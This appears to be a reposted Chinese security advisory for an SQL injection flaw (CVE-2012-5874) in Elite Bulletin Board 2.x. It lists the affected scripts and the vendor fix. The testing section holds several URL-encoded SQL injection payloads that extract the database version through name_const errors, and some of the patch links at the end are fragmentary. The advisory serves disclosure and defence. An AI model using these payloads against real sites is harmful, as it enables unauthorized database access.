function.php”脚本多个函数SQL注入漏洞

发布日期:2012-12-19
更新日期:2012-12-21

受影响系统:
Elite Bulletin Board Elite Bulletin Board 2.x
Elite Bulletin Board Elite Bulletin Board 2.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57000
CVE(CAN) ID: CVE-2012-5874

Elite Bulletin Board是电子公告版软件。

Elite Bulletin 2.1.21及其他版本"/includes/user_function.php"内的"update_whosonline_reg()"和"update_whosonline_guest()"函数没有效过滤URI数据,远程攻击者可以发送特制的HTTP请求到下列脚本,并在应用的数据库内执行任意SQL命令:

- checkuser.php
- groups.php
- index.php
- login.php
- quicklogin.php
- register.php
- Search.php
- viewboard.php
- viewtopic.php

<*来源:High-Tech Bridge Security Research Lab
 
  链接:https://www.htbridge.com/advisory/HTB23133
       
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/

%27,%28%28select*from%28s elect%20name_const%28version%28%29,1%29,name_const %28version%28%29,1%29%29a%29%29%29%20--%20/

%27,%28%28select*from%28selec t%20name_const%28version%28%29,1%29,name_const% 28version%28%29,1%29%29a%29%29%29%20--%20/

%27,%28%28select*from%28select %20name_const%28version%28%29,1%29,name_const% 28version%28%29,1%29%29a%29%29%29%20--%20/

%27,%28%28select*from%28s elect%20name_const%28version%28%29,1%29,name_c onst%28version%28%29,1%29%29a%29%29%29%20--%20/

%27,%28%28select*from% 28select%20name_const%28version%28%29,1%29,name_con st%28version%28%29,1%29%29a%29%29%29%20--%20/

%27,%28%28select*from%2 8select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2

%27,%28%28select *from%28select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2&amp;amp;tid=1

建议:
--------------------------------------------------------------------------------
厂商补丁:

Elite Bulletin Board
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载v2.1.22:

?bid=1&tid=310

%20Bulletin%20Board%20v2/2.1.22/

linux

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wygxyw.html